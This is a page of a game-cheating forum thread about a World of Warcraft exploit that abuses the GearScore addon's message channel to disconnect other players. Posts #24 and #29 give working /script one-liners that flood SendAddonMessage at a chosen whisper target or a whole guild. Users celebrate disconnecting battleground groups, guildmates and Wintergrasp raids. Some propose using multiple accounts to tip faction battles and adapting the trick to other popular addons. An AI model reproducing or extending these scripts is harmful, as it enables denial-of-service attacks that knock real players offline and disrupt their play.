Disconnect Anyone Using GearScore Addon menu

User Tag List

Page 2 of 5 FirstFirst 12345 LastLast
Results 16 to 30 of 66
  1. #16
    Ssateneth's Avatar Contributor
    Reputation
    142
    Join Date
    May 2008
    Posts
    866
    Thanks G/R
    1/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    +rep'd. DC'd about 20% of my last AV group repeatedly. Had one person wondering why he was spam whispering me..

    Disconnect Anyone Using GearScore Addon
  2. #17
    Ssateneth's Avatar Contributor
    Reputation
    142
    Join Date
    May 2008
    Posts
    866
    Thanks G/R
    1/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by kargho View Post
    any idea how to make it work for custom channels or general / trade chat?
    using 'GENERAL' just gave me a whole lot of errors
    It's impossible to send addon messages to anything except BGs, raids, parties, and whispers. You can do it to a select couple of people with whisper but doing too many seperate whisper targets may DC you instead.

  3. #18
    NoticablyF.A.T's Avatar Member
    Reputation
    1
    Join Date
    Jan 2008
    Posts
    26
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thank you for this , Unlimited enjoyment

  4. #19
    lettuce9's Avatar Active Member
    Reputation
    19
    Join Date
    Jan 2008
    Posts
    95
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by chartgraves View Post



    change the "0.7" in the script to "1.0" and you should not disconnect

    that didnt work

    i changed the other value too

  5. #20
    jogt9's Avatar Member
    Reputation
    1
    Join Date
    Sep 2009
    Posts
    5
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks! What can be better than preventing other people to enjoy their gaming time? 6):

  6. #21
    kargho's Avatar Member
    Reputation
    6
    Join Date
    May 2009
    Posts
    105
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I dont know if one of my guildys was using an addon to track this or not but he sent me a whisper explaining how I was somehow forcing his client to send me whispers constantly (this was while i had the script enabled).
    I didnt see these whispers I was 'forcing' him to send

    this could be an issue as I think eventually you will run into a non guildy who will probably report you

  7. #22
    Blizzhaxer's Avatar Active Member
    Reputation
    57
    Join Date
    Jun 2006
    Posts
    436
    Thanks G/R
    1/7
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by kargho View Post
    I dont know if one of my guildys was using an addon to track this or not but he sent me a whisper explaining how I was somehow forcing his client to send me whispers constantly (this was while i had the script enabled).
    I didnt see these whispers I was 'forcing' him to send

    this could be an issue as I think eventually you will run into a non guildy who will probably report you
    so they would report you for there add on DCing them >.>
    Exploration: To go where the Game designer thinks you don't know about!

  8. #23
    kargho's Avatar Member
    Reputation
    6
    Join Date
    May 2009
    Posts
    105
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    it is using a script with malicious intent against other users, I am fairly certain that blizz would start throwing around bans for this....

    also just tried in wintergrasp and managed to dc almost all of the raid for 40 seconds, none of them sent me a tell saying "wtf are you doing to me"

    and if you have multiple accounts you can dc one faction in wintergrasp and let the other win when one faction sevearly outnumbers the other

  9. #24
    BonutDot's Avatar Contributor
    Reputation
    235
    Join Date
    Aug 2006
    Posts
    418
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by kargho View Post
    any idea how to make it work for custom channels or general / trade chat?
    using 'GENERAL' just gave me a whole lot of errors
    Not possible: API SendAddonMessage - WoWWiki - Your guide to the World of Warcraft

    You may target specific people with

    Code:
    /script t=0;z=10;CreateFrame("frame"):SetScript("OnUpdate", function(s,e) if t>0.7 then for i=0,100 do SendAddonMessage("GearScore_Version","","WHISPER","HURFDURFTARGETNAME")end;if z>1 then t=0 else z=z-1 end elseif z>1 then t=t+e end end)
    Be VERY careful with this exploit, I suspect that you will absolutely be banned for this. Blizzard takes denial of service very seriously, and this is pretty much a textbook definition of it.

  10. #25
    Erra's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    69
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Roflmao, awesome xD
    Anything to annoy people

  11. #26
    Phoen!x's Avatar Contributor
    Reputation
    199
    Join Date
    Aug 2007
    Posts
    459
    Thanks G/R
    6/3
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    A rep cookie for you.
    Nice find. :]


  12. #27
    Sklug's Avatar ★ Elder ★
    Reputation
    1084
    Join Date
    Mar 2008
    Posts
    1,210
    Thanks G/R
    210/224
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hilarious-- just knocked out 12 guildies lol -- No one said anything to me either... But, I AM the guild leader so maybe they wouldn't. Is this an anonymous command or can they see it is you that forced their addon to d/c them?

  13. #28
    kargho's Avatar Member
    Reputation
    6
    Join Date
    May 2009
    Posts
    105
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Im thinking that this exploit can be used to target people with other addons.

    All you would need to do is find an addon using the addon chat channel (or do they all use it by default even if they dont need to communicate?) that everyone uses like deady boss mods.
    Then possibly adapt it (Im not sure if the variables used in the original script are addon specific or not). I will play around with it a bit and post if i get anywhere.

  14. #29
    Barrt73Rus's Avatar Banned
    Reputation
    171
    Join Date
    May 2009
    Posts
    1,272
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    /script t=0;z=10;CreateFrame("frame"):SetScript("OnUpdate", function(s,e) if t>0.7 then for i=0,100 do SendAddonMessage("GearScore_Version","","GUILD","")end;if z>1 then t=0 else z=z-1 end elseif z>1 then t=t+e end end)

    DC me too =\ but i dont have addon

  15. #30
    chartgraves's Avatar Member
    Reputation
    55
    Join Date
    Jul 2008
    Posts
    68
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yay! I'm glad you guys are enjoying this - I can't wait till prime tonight in WG.... If I see a bunch of alliance coming to me I am going to spam that script and hope they disappear, cause I want to see if it works with opposite faction.

Page 2 of 5 FirstFirst 12345 LastLast

Similar Threads

  1. Do anyone know what addons is used in this UI ?
    By Cubensiss in forum WoW UI, Macros and Talent Specs
    Replies: 6
    Last Post: 10-01-2013, 01:10 PM
  2. Anyone Use Ascent CMS?
    By logicd22 in forum World of Warcraft Emulator Servers
    Replies: 1
    Last Post: 01-20-2008, 10:49 AM
  3. Has anyone used this site?
    By Artondrius in forum World of Warcraft General
    Replies: 1
    Last Post: 11-12-2007, 12:53 AM
All times are GMT -5. The time now is 08:28 PM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search